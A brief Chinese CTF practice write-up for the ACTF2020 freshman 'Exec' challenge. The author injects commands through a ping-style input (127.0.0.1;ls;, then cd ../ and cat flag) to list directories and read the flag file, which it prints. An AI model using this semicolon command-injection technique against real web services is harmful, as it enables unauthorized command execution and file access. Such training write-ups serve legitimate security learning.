CTF练习日记——[ACTF2020 新生赛]Exec 1

首先打开后见到这样一个界面，看起来是个命令注入界面，试试看是否过滤了分号：127.0.0.1;ls;

发现没有过滤分号，且当前目录下有一个index.php，我们尝试切换到上一级目录看是否有其他有用信息：127.0.0.1;cd ..;ls;

看起来没啥用，继续上一级目录看：127.0.0.1;cd ../../;ls;

还是没遇到看起来像flag的文件，再上一级呢：127.0.0.1;cd ../../../;ls;

我们可以看到一个叫flag的文件，打开试试：127.0.0.1;cd ../../../;cat flag;

得到flag：flag{4efae16b-33e5-4b81-be63-798618c6e788}